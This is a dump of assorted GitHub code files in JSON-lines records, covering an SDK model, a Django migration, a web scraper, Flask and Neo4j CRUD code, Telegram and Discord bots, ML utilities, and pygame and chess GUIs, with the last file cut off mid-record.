self.dockerRepository = dockerRepository\n self.dockerRegistryUri = dockerRegistryUri\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/compile/models/Job.py","file_name":"Job.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"3440349609","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('game', '0009_auto_20151209_1753'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('textid', models.CharField(default='Undefined', max_length=30, verbose_name='Event Identifier')),\n ('context', models.BinaryField(default='{}', max_length=500, verbose_name='Context')),\n ('time', models.DateTimeField(verbose_name='Time of event')),\n ('unread', models.BooleanField(default=True, verbose_name='Is Unread')),\n ('hometown', models.ForeignKey(to='game.Village')),\n ],\n ),\n ]\n","repo_name":"Elscouta/hostilelands-py","sub_path":"game/migrations/0010_event.py","file_name":"0010_event.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25269441212","text":"import requests\nimport datetime\nimport json\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse, parse_qs\n\ndef return_bs_content_for_page_nr(page: int) -> BeautifulSoup:\n url = \"https://www.kunstpuntgroningen.nl/kunst/kunst-op-straat/de-collectie/?pag=\"\n url = url + str(page)\n\n r = requests.get(url)\n print(f\"🚀 Inhoud van pagina {url} opgevragen\")\n soup = BeautifulSoup(r.content, \"html.parser\")\n if soup is None:\n print(\"Geen content gevonden met BeautifulSoup\")\n exit\n\n return soup\n \n\ndef return_list_of_urls(soup: BeautifulSoup) -> list:\n print(\"🚀 Ophalen van alle items op de pagina\")\n list_of_urls = []\n css_class_for_item = \"m-tile\"\n css_type_for_item = \"a\"\n\n content = soup.find('base-overview')\n content_data = content.get(':data')\n\n json_content = json.loads(content_data)\n\n for item in json_content['items']:\n list_of_urls.append(item['url'])\n\n print(f\"{str(len(list_of_urls))} items op de pagina gevonden\")\n return list_of_urls\n\ndef scrape_from_object_url(url: str):\n r = requests.get(url)\n soup = BeautifulSoup(r.content, \"html.parser\")\n\n article_element = soup.find(\"article\")\n if article_element:\n title = \"\"\n description = \"\"\n wijk = \"\"\n kunstsoort = \"\"\n jaar = 0\n longitude = 0.0\n latitude = 0.0\n\n header_element = article_element.find(\"header\")\n if header_element:\n h1_title_element = header_element.find(\"h1\", class_=\"a-heading a-heading--h2\")\n\n if h1_title_element:\n title = h1_title_element.get_text(strip=True)\n else:\n print(f\"Title not found for {url}\")\n\n facts_list = article_element.find_all(\"li\", class_=\"m-list__item\")\n for fact in facts_list:\n if \"Wijk\" in fact.text:\n wijk_text = fact.text.replace(\"Wijk\", \"\").strip()\n wijk = wijk_text\n if \"Jaar van realisatie\" in fact.text:\n jaar_text = fact.text.replace(\"Jaar van realisatie\", \"\").strip()\n jaar = int(jaar_text)\n if \"Kunstsoort\" in fact.text:\n kunstsoort_text = fact.text.replace(\"Kunstsoort\", \"\").strip()\n kunstsoort = kunstsoort_text\n\n maps_image = 
article_element.find(\"base-map-screenshot\")\n try:\n maps_src = maps_image.get(\":markers\")\n maps_markers = json.loads(maps_src)\n latitude = float(maps_markers[0].get('lat', None))\n longitude = float(maps_markers[0].get('lng', None))\n except:\n print(f\"Mislukt om de lon+lat waardes uit {maps_image} te halen\")\n\n art_object = {\n \"id\": 0,\n \"title\": title,\n \"description\": description,\n \"wijk\": wijk,\n \"jaar\": jaar,\n \"kunstsoort\": kunstsoort,\n \"url\": \"\",\n \"avatarFile\": \"\",\n \"gifFile\": \"logitech-muis.gif\",\n \"location\": {\n \"latitude\": latitude,\n \"longitude\": longitude\n }\n }\n\n return art_object\n\ndef return_distinct_kunstsoort():\n\n with open('available-objects.json', 'r') as file:\n data = json.load(file)\n\n distinct_kunstsoort = set(item['kunstsoort'] for item in data)\n\n print(\" \")\n print(\"Distinct values of 'kunstsoort':\")\n for kunstsoort in distinct_kunstsoort:\n print(kunstsoort) \n\ndef return_distinct_wijk():\n\n with open('available-objects.json', 'r') as file:\n data = json.load(file)\n\n distinct_wijk = set(item['wijk'] for item in data)\n print(\" \")\n print(\"Distinct values of 'wijk':\")\n for wijk in distinct_wijk:\n print(wijk) \n\ndef return_collectie():\n\n TOTAL_PAGES = 20\n\n complete_collection = []\n\n soup_page_list = []\n total_url_list = []\n for page_number in range(1, TOTAL_PAGES + 1):\n content = return_bs_content_for_page_nr(page_number)\n soup_page_list.append(content)\n\n for page_content in soup_page_list:\n urls_on_page = return_list_of_urls(page_content)\n\n for url in urls_on_page:\n total_url_list.append(url)\n \n print(f\"🚀 {str(len(total_url_list))} links van objecten gevonden\")\n \n for url in total_url_list:\n art_object = scrape_from_object_url(url)\n\n complete_collection.append(art_object)\n\n complete_collection_as_json = json.dumps(complete_collection, indent=2)\n file_name = \"available-objects.json\"\n\n data = json.loads(complete_collection_as_json)\n\n with open(file_name, \"w\") as json_file:\n json.dump(data, json_file, indent=4)\n\n return_distinct_kunstsoort()\n return_distinct_wijk()\n \n\nif __name__ == \"__main__\":\n return_collectie()","repo_name":"Ffyud/urbaniteer","sub_path":"scrape-kunstspot.py","file_name":"scrape-kunstspot.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4608180831","text":"from flask import request\nimport datetime\nfrom py2neo import Node, Relationship, remote, NodeSelector\n\nfrom models.users_model import User\n\nfrom config import graph\n\n\nclass Note:\n\n @staticmethod\n def find_one(note_id):\n note = graph.run(f\"MATCH (note:Note) WHERE ID(note)={note_id} RETURN note\").evaluate()\n\n if note:\n note['id'] = note_id\n return note\n else:\n return {\"message\": \"Note not found!\"}\n\n @staticmethod\n def find_all(task_id):\n notes = graph.run(\n f\"MATCH (note:Note)-[:IS_NOTE_OF]->(task:Task) WHERE ID(task)={task_id} RETURN note\").data()\n\n notes_list = []\n for n in notes:\n note = n['note']\n note_id = remote(note)._id\n note['id'] = note_id\n\n notes_list.append(note)\n\n return notes_list\n\n @staticmethod\n def add(current_user_id, task_id, data):\n\n all_attributes = [\"client\", \"date\", \"message\", \"user\"]\n\n date_created = str(datetime.datetime.now()).replace(' ', 'T') + \"Z\"\n\n try:\n new_note = Node(\"Note\",\n client=data['client'],\n date=data['date'],\n message=data['message']\n )\n except KeyError as e:\n return 
{\"message\": f\"You are missing a key element: {e}\"}\n\n new_note['date_created'] = date_created\n new_note['user'] = current_user_id\n\n graph.create(new_note)\n\n task = graph.run(f\"MATCH (task:Task) WHERE ID(task)={task_id} RETURN task\").evaluate()\n\n note_task_rel = Relationship(new_note, 'IS_NOTE_OF', task)\n graph.create(note_task_rel)\n\n new_note['id'] = remote(new_note)._id\n\n return new_note\n\n @staticmethod\n def update(note_id):\n note = Note.find_one(note_id)\n\n if note.get(\"message\") == \"Note not found!\":\n return {\"message\": f\"Note {note_id} not found!\"}\n\n data = request.get_json()\n\n for attribute in data:\n if note[attribute] is not None:\n note[attribute] = data[attribute]\n else:\n return {\"message\": f\"The attribute {attribute} is not found!\"}\n note.push()\n\n return note\n\n @staticmethod\n def delete(note_id):\n note = Note.find_one(note_id)\n\n if note.get(\"message\") == \"Note not found!\":\n return {\"message\": f\"Note {note_id} not found!\"}\n\n graph.run(f\"MATCH (note:Note) WHERE ID(note)={note_id} DETACH DELETE note\").evaluate()\n return {\"message\": f\"The Note with id {note_id} has been deleted\"}","repo_name":"alhemyo/v-man","sub_path":"back-end/models/notes_model.py","file_name":"notes_model.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33075304737","text":"number = input('Enter number (15 or 16 digits): ').upper()\nresult = 0\nfor i in range(15):\n num = number[i]\n r = result\n if(i % 3 == 0):\n result += int(num)\n elif(i % 3 == 1):\n n = int(num) * 2\n result += int(n/10) + n % 10\n else:\n n = int(num) * 3\n result += int(n/10) + n % 10\nremainder = result % 11\nif(remainder == 0):\n digit = 0\nelif(remainder == 1):\n digit = 'X'\nelse:\n digit = 11 - remainder\nif len(number) == 15:\n print('Check digit is: {}'.format(digit))\nelse:\n print('Number {} check'.format('passes' if str(digit) == number[-1] else 'fails'))","repo_name":"spencrr/MSOE-Op-Comp-2018","sub_path":"prob8.py","file_name":"prob8.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11365065400","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom PIL import Image\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\nTFRECORD_FILE = \"./tmp/binary_mnist.tfrecords\"\nIMAGE_SIZE = 28\nCHANNEL_NUM = 1\n\ndef read_train_data(FLAGS, num1, num2):\n if not os.path.exists(TFRECORD_FILE):\n generate_tfrecord(FLAGS, num1, num2)\n print(\"Successfully generate binary_mnist tfrecords!\")\n tr_data, tr_label = read_tfrecords(FLAGS)\n return tr_data, tr_label\n\n\ndef get_mnist(FLAGS, num1, num2):\n mnist = read_data_sets(\"/dataset/mnist/\", dtype=tf.float32, one_hot=True)\n total_tr_data, total_tr_label = mnist.train.next_batch(mnist.train._num_examples)\n \n # Gathering a1 Data\n tr_data_a1=total_tr_data[(total_tr_label[:,num1]==1.0)]\n # add noise\n for i in range(len(tr_data_a1)):\n for j in range(len(tr_data_a1[0])):\n rand_num=np.random.rand()\n if(rand_num>=0.5):\n tr_data_a1[i,j]=np.minimum(tr_data_a1[i,j]+rand_num,1.0)\n \n # Gathering a2 Data\n tr_data_a2=total_tr_data[(total_tr_label[:,num2]==1.0)]\n for i in range(len(tr_data_a2)):\n for j in range(len(tr_data_a2[0])):\n rand_num=np.random.rand()\n if(rand_num>=0.5):\n tr_data_a2[i,j]=np.minimum(tr_data_a2[i,j]+rand_num,1.0)\n \n 
tr_data1=np.append(tr_data_a1,tr_data_a2,axis=0)\n tr_label1=np.zeros((len(tr_data1),2),dtype=float)\n for i in range(len(tr_data1)):\n if(iDownload as text', text)[0]\n\n def lang(self, lang):\n return {\n '.py': \"python\",\n '.cs': \"csharp\",\n '.php': \"php\",\n '.css': \"css\",\n \".pl\": \"perl\",\n \".rb\": \"rb\",\n \".css\": \"css\",\n \".sh\": \"bash\",\n \".go\": \"go\",\n \".html\": \"html\",\n \".js\": \"js\"\n }.get(lang, \"text\")\n\n def share(self, file):\n fileName, ext = file\n code = open(fileName+ext, \"r\").read()\n syntax = self.lang(ext)\n\n data = {\"content\": code, \"syntax\": syntax, \"poster\": self.username}\n request = post(\"https://paste.ubuntu.com/\", data=data)\n\n return self.findUrl(request.text)\n\n def main(self, file):\n if not path.exists(file):\n raise FileNotFoundError(\"File {0} Not Found!\".format(file))\n else:\n pasteUrl = self.share(path.splitext(file))\n data = {\"id\": pasteUrl, \"time\": strftime('%c'), \"poster\": self.username}\n self.jData.append(data)\n with open(self.jsonFile, 'w') as outfile:\n dump(self.jData, outfile, sort_keys=True, indent=4)\n return pasteUrl\n","repo_name":"emregeldegul/codesh","sub_path":"codesh/codesh.py","file_name":"codesh.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"9416222267","text":"import inspect\nimport sys\n\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\n\n\n# from telegramgpt.gpt import send_message_to_openai\nfrom config import BOT_TOKEN, ADMIN_CHAT_ID, logger\n\n\nbot = Bot(token=BOT_TOKEN)\nstorage = MemoryStorage()\ndp = Dispatcher(bot, storage=storage)\n\n\n@dp.message_handler(commands=[\"help\"], chat_id=ADMIN_CHAT_ID)\nasync def cmd_help(message: types.Message):\n \"\"\"Return all available command.\"\"\"\n\n logger.debug(f\"Got message: {message}\")\n\n command_list = [\n name.replace(\"cmd_\", \"/\")\n for name, obj in inspect.getmembers(sys.modules[__name__])\n if (inspect.isfunction(obj) and name.startswith(\"cmd_\"))\n ]\n commands = \"\\n\".join(command_list)\n\n await message.reply(f\"Active commands:\\n{commands}\")\n\n\n@dp.message_handler(commands=[\"check\"], chat_id=ADMIN_CHAT_ID)\nasync def cmd_check(message: types.Message):\n \"\"\"Check bot status.\"\"\"\n\n logger.debug(f\"Got message: {message}\")\n logger.info(\"Check\")\n\n await message.reply(\"OK!\")\n\n\n@dp.message_handler(commands=[\"send_to_openai\"], chat_id=ADMIN_CHAT_ID)\nasync def cmd_send_to_openai(message: types.Message):\n \"\"\"Send message to openai.\"\"\"\n\n logger.debug(f\"Got message: {message}\")\n\n # result = await send_message_to_openai(message=message)\n # if result:\n # await message.reply(result)\n # else:\n # logger.error(f\"Do not get result for message: {message}\")\n # await message.reply(\"Internal error\")\n\n\ndef start_bot() -> None:\n executor.start_polling(dispatcher=dp, skip_updates=True)\n","repo_name":"alserious/TelegramGPTBot","sub_path":"TelegramGPT/telegramgpt/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73626019319","text":"\"\"\"\nSAMR main module, PhraseSentimentPredictor is the class that does the\nprediction and therefore one of the main entry points to the 
library.\n\"\"\"\nfrom collections import defaultdict\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.pipeline import make_pipeline, make_union\nfrom sklearn.metrics import accuracy_score\nimport rnn\nimport numpy as np\n\nfrom transformations import (ExtractText, ExtractAuthor,ExtractDate,EncodingText)\n\n\n_valid_classifiers = {\n \"sgd\": SGDClassifier,\n \"knn\": KNeighborsClassifier,\n \"svc\": SVC,\n \"randomforest\": RandomForestClassifier,\n 'rnn':rnn.RNN,\n}\n\n\ndef target(phrases):\n return [datapoint.rating for datapoint in phrases]\n\n\nclass PhraseSentimentPredictor:\n \"\"\"\n sentiments. API is a-la scikit-learn, where:\n - `__init__` configures the predictor\n - `fit` trains the predictor from data. After calling `fit` the instance\n methods should be free side-effect.\n - `predict` generates sentiment predictions.\n - `score` evaluates classification accuracy from a test set.\n\n Outline of the predictor pipeline is as follows:\n A configurable main classifier is trained with a concatenation of 3 kinds of\n features:\n - The decision functions of set of vanilla SGDClassifiers trained in a\n one-versus-others scheme using bag-of-words as features.\n - (Optionally) The decision functions of set of vanilla SGDClassifiers\n trained in a one-versus-others scheme using bag-of-words on the\n wordnet synsets of the words in a phrase.\n - (Optionally) The amount of \"positive\" and \"negative\" words in a phrase\n as dictated by the Harvard Inquirer sentiment lexicon\n\n\n Optionally, during prediction, it also checks for exact duplicates between\n the training set and the train set. \"\"\"\n def __init__(self, classifier=\"rnn\", classifier_args=None, lowercase=False,\n text_replacements=None, map_to_synsets=False, binary=False,\n min_df=0, ngram=1, stopwords=None, limit_train=None,\n map_to_lex=False, duplicates=False):\n \"\"\"\n Parameter description:\n - `classifier`: The type of classifier used as main classifier,\n valid values are \"sgd\", \"knn\", \"svc\", \"randomforest\".\n - `classifier_args`: A dict to be passed as arguments to the main\n classifier.\n - `lowercase`: wheter or not all words are lowercased at the start of\n the pipeline.\n - `text_replacements`: A list of tuples `(from, to)` specifying\n string replacements to be made at the start of the pipeline (after\n lowercasing).\n - `map_to_synsets`: Whether or not to use the Wordnet synsets\n feature set.\n - `binary`: Whether or not to count words in the bag-of-words\n representation as 0 or 1.\n - `min_df`: Minumim frequency a word needs to have to be included\n in the bag-of-word representation.\n - `ngram`: The maximum size of ngrams to be considered in the\n bag-of-words representation.\n - `stopwords`: A list of words to filter out of the bag-of-words\n representation. Can also be the string \"english\", in which case\n a default list of english stopwords will be used.\n - `limit_train`: The maximum amount of training samples to give to\n the main classifier. 
This can be useful for some slow main\n          classifiers (ex: svc) that converge with fewer samples to an\n          optimum.\n        - `map_to_lex`: Whether or not to use the Harvard Inquirer lexicon\n          features.\n        - `duplicates`: Whether or not to check for identical phrases between\n          train and prediction.\n        \"\"\"\n        self.limit_train = limit_train\n        self.duplicates = duplicates\n\n        self.vocabulary=[]\n        import csv\n        with open('./data/vocabulary','rb') as f:\n            rd=csv.reader(f)\n            for line in rd:\n                self.vocabulary.append(line[0])\n\n        # Build pre-processing common to every extraction\n        pipeline1 = [ExtractText()]\n        pipeline1.append(EncodingText(self.vocabulary))\n        pipeline=make_pipeline(*pipeline1)\n\n        # Build classifier and put everything together\n        if classifier_args is None:\n            classifier_args = {'lambdaL': 0.0001, 'd': 50, 'cat': 4, 'lambdaCat': 1e-07, 'alpha': 0.2, 'lambdaW': 1e-05,'iter':70}\n        if 'd' in classifier_args:\n            d=classifier_args['d']\n        else:\n            d=50\n        words_vectors=np.random.rand(d,len(self.vocabulary))*2*0.05-0.05\n        classifier = _valid_classifiers[classifier](vocab=len(self.vocabulary),words_vectors=words_vectors,**classifier_args)\n\n        #classifier=rnn.RNN(d=50,cat=4,vocab=len(self.vocabulary),alpha=0.2,words_vectors=words_vectors,lambdaW=10**(-5),lambdaCat=10**(-7),lambdaL=10**(-4))\n\n        self.pipeline = pipeline\n        self.classifier = classifier\n\n    def fit(self, phrases, y=None):\n        \"\"\"\n        `phrases` should be a list of `Datapoint` instances.\n        `y` should be a list of `str` instances representing the sentiments to\n        be learnt.\n        \"\"\"\n        y = target(phrases)\n        if self.duplicates:\n            self.dupes = DuplicatesHandler()\n            self.dupes.fit(phrases, y)\n        Z = self.pipeline.fit_transform(phrases, y)\n        if self.limit_train:\n            self.classifier.fit(Z[:self.limit_train], y[:self.limit_train])\n        else:\n            self.classifier.fit(Z, y)\n        return self\n\n    def predict(self, phrases):\n        \"\"\"\n        `phrases` should be a list of `Datapoint` instances.\n        Return value is a list of `str` instances with the predicted sentiments.\n        \"\"\"\n        Z = self.pipeline.transform(phrases)\n        labels = self.classifier.predict(Z)\n        if self.duplicates:\n            for i, phrase in enumerate(phrases):\n                label = self.dupes.get(phrase)\n                if label is not None:\n                    labels[i] = label\n        return labels\n\n    def score(self, phrases,k):\n        \"\"\"\n        `phrases` should be a list of `Datapoint` instances.\n        Return value is a `float` with the classification accuracy of the\n        input.\n        \"\"\"\n        pred = self.predict(phrases)\n        import csv\n        with open('./data/result-'+str(k),'wb') as f:\n            wrt=csv.writer(f)\n            for i in range(len(phrases)):\n                datapoint=[phrases[i].id, phrases[i].date, phrases[i].content, phrases[i].rating, pred[i]]\n                wrt.writerow(datapoint)\n\n        return accuracy_score(target(phrases), pred)\n\n    def error_matrix(self, phrases):\n        predictions = self.predict(phrases)\n        matrix = defaultdict(list)\n        for phrase, predicted in zip(phrases, predictions):\n            if phrase.rating != predicted:\n                matrix[(phrase.rating, predicted)].append(phrase)\n        return matrix\n\nclass DuplicatesHandler:\n    def fit(self, phrases, target):\n        self.dupes = {}\n        for phrase, label in zip(phrases, target):\n            self.dupes[self._key(phrase)] = label\n\n    def get(self, phrase):\n        key = self._key(phrase)\n        return self.dupes.get(key)\n\n    def _key(self, x):\n        return \" \".join(x.content.lower().split())\n\n\nclass _Baseline:\n    def fit(self, X, y=None):\n        return self\n\n    def predict(self, X):\n        return [\"2\" for _ in X]\n\n    def score(self, X):\n        gold = target(X)\n        pred = self.predict(X)\n        return accuracy_score(gold, 
pred)\n","repo_name":"kevinhsu/Semi-supervised-Recursive-Autoencoders-for-Opinion-Detection-on-Twitter","sub_path":"sa/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":7839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"71501398199","text":"#!/usr/bin/env python\n\"\"\"\nCreate an xyz file for one particle\n\"\"\"\nimport os, sys, commands\nimport Numeric, math\n\ndef main():\n\n    pi = math.pi\n    t = Numeric.arange(10000,typecode=Numeric.Float)*0.01\n    x = Numeric.sin(2*pi*1.1*t)\n    y = Numeric.sin(2*pi*2.0*t)\n    z = Numeric.sin(2*pi*2.7*t)\n    \n    out = open('ATOM.xyz','w')\n    for i in range(len(t)):\n        out.write('1\\n'+str(i)+'\\n')\n        out.write('N '+str(x[i])+' '+str(y[i])+' '+str(z[i])+'\\n')\n    out.close()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"boates/physics","sub_path":"generate_xyz_trajectory.py","file_name":"generate_xyz_trajectory.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"30736807100","text":"\nimport discord\nfrom dotenv import *\n\nload_dotenv(\"token.env\")\n\n\nclient = discord.Client(intents = discord.Intents.all())\n\n@client.event\nasync def on_ready():\n    print(f\"{client.user} is now running\")\n    await client.change_presence(status=discord.Status.dnd)\n\n\nclient.run(get_key(\"TOKEN\"))","repo_name":"Immortal-youtube/Project-CLI","sub_path":"pythonDiscordTemplate/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"72270998839","text":"from flask_app import app\nfrom flask import render_template,redirect,request\nfrom flask_app.models.user import User\n\n@app.route('/')\ndef index():\n    users = User.get_all()\n    return render_template('index.html', users=users)\n\n@app.route('/users/new')\ndef new_user():\n\n    return render_template('new_user.html')\n\n@app.route('/users/create',methods=['POST'])\ndef create():\n    User.create(request.form)\n    return redirect('/')\n\n@app.route('/users/show/<int:user_id>')\ndef showone(user_id):\n    data ={\n        'id':user_id\n    }\n    user = User.get_one(data)\n    print(user)\n    return render_template('one_user.html',user=user)\n\n\n@app.route('/users/show/<int:user_id>/edit')\ndef edit(user_id):\n    user = User.get_one({'id':user_id})\n    return render_template('edit.html',user = user)\n\n\n@app.route('/users/update/<int:user_id>/', methods=['post'])\ndef updateuser(user_id):\n    User.update(request.form)\n    return redirect('/')\n\n@app.route('/users/delete/<int:user_id>/')\ndef remove(user_id):\n    data ={\n        'id':user_id\n    }\n    User.delete(data)\n    return redirect('/')\n\n    \n","repo_name":"youssefch2003/Python_Stack","sub_path":"week2/user crud modularized/flask_app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27143986701","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#####################################\n# File name : trans_tf_torch.py\n# Create date : 2019-03-16 14:49\n# Modified date : 2019-03-20 14:39\n# Author : DARREN\n# Describe : not set\n# Email : lzygzh@126.com\n#####################################\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\n\ndef load_tf_weights_in_openai_gpt(model, openai_checkpoint_folder_path):\n    \"\"\" Load tf pre-trained weights in a pytorch 
model (from NumPy arrays here)\n    \"\"\"\n    import re\n    import numpy as np\n    import torch\n    print(\"Loading weights...\")\n    names = json.load(open(openai_checkpoint_folder_path + '/parameters_names.json', \"r\", encoding='utf-8'))\n    shapes = json.load(open(openai_checkpoint_folder_path + '/params_shapes.json', \"r\", encoding='utf-8'))\n    offsets = np.cumsum([np.prod(shape) for shape in shapes])\n    init_params = [np.load(openai_checkpoint_folder_path + '/params_{}.npy'.format(n)) for n in range(10)]\n    init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]\n    init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]\n\n    # This was used when we had a single embedding matrix for positions and tokens\n    # init_params[0] = np.concatenate([init_params[1], init_params[0]], 0)\n    # del init_params[1]\n    init_params = [arr.squeeze() for arr in init_params]\n\n    try:\n        assert model.tokens_embed.weight.shape == init_params[1].shape\n        assert model.positions_embed.weight.shape == init_params[0].shape\n    except AssertionError as e:\n        e.args += (model.tokens_embed.weight.shape, init_params[1].shape)\n        e.args += (model.positions_embed.weight.shape, init_params[0].shape)\n        raise\n\n    model.tokens_embed.weight.data = torch.from_numpy(init_params[1])\n    model.positions_embed.weight.data = torch.from_numpy(init_params[0])\n    names.pop(0)\n    # Pop position and token embedding arrays\n    init_params.pop(0)\n    init_params.pop(0)\n\n    for name, array in zip(names, init_params):  # names[1:n_transfer], init_params[1:n_transfer]):\n        name = name[6:]  # skip \"model/\"\n        assert name[-2:] == \":0\"\n        name = name[:-2]\n        name = name.split('/')\n        pointer = model\n        for m_name in name:\n            if re.fullmatch(r'[A-Za-z]+\\d+', m_name):\n                l = re.split(r'(\\d+)', m_name)\n            else:\n                l = [m_name]\n            if l[0] == 'g':\n                pointer = getattr(pointer, 'weight')\n            elif l[0] == 'b':\n                pointer = getattr(pointer, 'bias')\n            elif l[0] == 'w':\n                pointer = getattr(pointer, 'weight')\n            else:\n                pointer = getattr(pointer, l[0])\n            if len(l) >= 2:\n                num = int(l[1])\n                pointer = pointer[num]\n        try:\n            assert pointer.shape == array.shape\n        except AssertionError as e:\n            e.args += (pointer.shape, array.shape)\n            raise\n        print(\"Initialize PyTorch weight {}\".format(name))\n        pointer.data = torch.from_numpy(array)\n    return model\n","repo_name":"darr/gpt2","sub_path":"openai_gpt/gpt/base_gpt/trans_tf_torch.py","file_name":"trans_tf_torch.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"7183411894","text":"import pygame\nimport random\nimport time\nfrom characters.boomerang import boom_pic\n\n\nclass Displays:\n    def __init__(self):\n        self.boom_pic = boom_pic\n        self.rectangle = None\n\n        self.time_left = None\n        self.life_time = 6\n        self.timer = time.time()\n        self.is_collected = True\n        self.random_loc = -100, -100\n\n    def draw(self, screen, boom_number):\n        self.lives(screen, boom_number)\n        self.extra_life(screen)\n\n    @staticmethod\n    def lives(screen, boom_number):\n        for i in range(boom_number):\n            screen.blit(boom_pic, (10 + i * 30, 10))\n\n    @staticmethod\n    def score(screen, score):\n        a_text = pygame.font.SysFont(\"monospace\", 30).render('Score: {}'.format(score), True, (255, 255, 255))\n        a_rect = a_text.get_rect(center=(650, 20))\n        screen.blit(a_text, a_rect)\n\n    def extra_life(self, screen):\n        if time.time() - self.timer > 
random.randrange(20, 30):\n self.timer = time.time()\n self.is_collected = False\n self.random_loc = random.randrange(200, 500), random.randrange(200, 400)\n\n self.time_left = self.life_time + self.timer - time.time()\n if self.time_left > 0 and not self.is_collected:\n self.rectangle = self.boom_pic.get_rect(center=self.random_loc)\n self.extra_boom_level(screen, self.random_loc, self.life_time, int(self.time_left))\n screen.blit(self.boom_pic, self.random_loc)\n else:\n self.is_collected = True\n\n @staticmethod\n def extra_boom_level(screen, pos, hp_max, hp):\n for i in range(1, hp_max + 1):\n rect_w = 24/hp_max\n if i <= hp:\n colour = (4, 160, 34)\n else:\n colour = (180, 20, 34)\n pygame.draw.rect(screen, colour, pygame.Rect(pos[0] - 5 + i*rect_w, pos[1] - 8, rect_w, 3))\n","repo_name":"mikolajszym00/Pygame_LateInTheEvening","sub_path":"displays/displays.py","file_name":"displays.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42414516743","text":"import pygame as p\n\nfrom app.GUI.ModeWindow.PVC import PVC\nfrom app.GUI.ModeWindow.RankingWindow import RankingWindow\nfrom app.Modes.PvPLocal import game\nfrom app.config import MAX_FRAMERATE\n\n\nclass ModeWindow:\n def __init__(self):\n p.init()\n self.clock = p.time.Clock()\n self.WIDTH, self.HEIGHT = 512, 512\n self.WHITE = p.Color(\"White\")\n self.BLACK = p.Color(\"Black\")\n self.HOVER_WHITE = p.Color(225, 225, 225)\n self.HOVER_BLACK = p.Color(65, 65, 65)\n self.running = True\n\n self.screen = p.display.set_mode((self.WIDTH, self.HEIGHT))\n self.clock = p.time.Clock()\n p.display.set_caption(\"CHESS ME!\")\n self.font1 = p.font.SysFont(\"Arial\", 30, bold=True)\n self.font2 = p.font.SysFont(\"Arial\", 20, bold=True)\n self.font3 = p.font.SysFont(\"Arial\", 16, bold=True)\n self.font4 = p.font.SysFont(\"Arial\", 10)\n self.button_rects = []\n self.button_width = 300\n self.button_height = 70\n self.button_padding = 20\n self.button_x = (self.WIDTH - self.button_width) // 2\n self.button_y = self.HEIGHT // 4\n\n self.label1_x = (self.WIDTH - self.font1.render(\"CHESS.ME.COM\", True, self.BLACK).get_width()) // 2\n self.label1_y = self.button_y - self.font1.get_height() - 60\n\n self.label2_x = (self.WIDTH - self.font2.render(\"CHESS.COM SUCKS, WE ARE BETTER\", True,\n self.BLACK).get_width()) // 2\n self.label2_y = self.button_y - self.font2.get_height() - 20\n\n self.btn_images = [\n p.transform.scale(p.image.load(\"../resources/ChessImg/bN.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6))),\n p.transform.scale(p.image.load(\"../resources/ChessImg/wQ.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6))),\n p.transform.scale(p.image.load(\"../resources/ChessImg/bR.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6))),\n p.transform.scale(p.image.load(\"../resources/ChessImg/wB.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6)))\n ]\n\n def draw_buttons(self):\n button_texts = [\"Player VS Computer\", \"Player VS Player [Local]\", \"Top Players\", \"Load Your Last 